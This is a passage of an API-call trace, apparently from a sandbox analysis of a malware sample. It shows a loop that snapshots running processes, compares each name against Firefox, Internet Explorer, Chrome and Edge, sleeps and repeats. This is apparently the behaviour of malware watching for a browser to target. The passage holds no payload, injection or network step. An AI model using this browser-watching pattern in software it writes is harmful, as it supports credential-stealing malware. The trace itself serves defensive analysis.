dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0249.440] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0249.440] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0249.440] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0249.440] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.440] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0249.441] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0249.441] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0249.441] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0249.441] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.441] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0249.442] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0249.442] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0249.442] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0249.442] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.442] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0249.442] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0249.442] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0249.442] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0249.442] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.442] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0249.443] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0249.443] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0249.443] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0249.443] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.443] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0249.443] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0249.443] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0249.443] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0249.443] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.443] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0249.444] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0249.444] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0249.444] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0249.444] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.444] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0249.444] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0249.444] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0249.444] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0249.444] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.444] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0249.445] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0249.445] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0249.445] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0249.445] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.445] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0249.446] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0249.446] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0249.446] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0249.446] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.446] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0249.446] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0249.446] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0249.446] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0249.446] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.446] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0249.447] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0249.447] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0249.447] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0249.447] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.447] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0249.447] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0249.447] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0249.447] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0249.447] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.447] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0249.448] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0249.448] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0249.448] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0249.448] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.448] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0249.448] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0249.448] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0249.448] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0249.448] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.448] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.449] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0249.449] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0249.449] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0249.449] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.449] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.450] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.450] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.450] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.450] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.450] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0249.450] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0249.450] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0249.450] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0249.450] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.450] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.451] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0249.451] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0249.451] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0249.451] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.451] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0249.451] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0249.451] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0249.451] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0249.451] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.451] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.452] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0249.452] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0249.452] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0249.452] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.452] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0249.452] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0249.452] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0249.452] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0249.453] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.453] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.453] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0249.453] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0249.453] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0249.453] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0249.453] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.454] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0249.454] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0249.454] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0249.454] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.454] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.454] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0249.454] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0249.454] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0249.454] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.454] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.455] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0249.455] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0249.455] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0249.455] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.455] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.455] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0249.455] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0249.455] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0249.455] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0249.455] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0249.456] CloseHandle (hObject=0xd4) returned 1 [0249.456] Sleep (dwMilliseconds=0x3e8) [0250.491] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0250.492] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.493] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0250.493] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0250.493] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0250.493] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0250.493] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0250.493] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0250.493] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0250.493] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0250.493] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0250.494] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0250.494] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0250.494] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0250.494] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0250.494] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.494] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.495] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0250.495] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0250.495] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0250.495] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.495] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0250.495] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0250.495] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0250.495] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0250.495] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.495] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0250.496] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0250.496] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0250.496] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0250.496] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.496] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0250.496] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0250.496] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0250.496] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0250.496] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.496] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0250.497] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0250.497] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0250.497] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0250.497] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.497] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0250.497] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0250.497] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0250.497] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0250.498] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.498] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0250.498] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0250.498] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0250.498] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0250.498] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0250.498] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.499] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.499] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.499] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.499] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.499] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.499] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.499] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.499] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.499] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.499] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.500] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0250.500] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0250.500] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0250.500] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0250.500] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0250.500] lstrcmpiA (lpString1="svchost.exe", 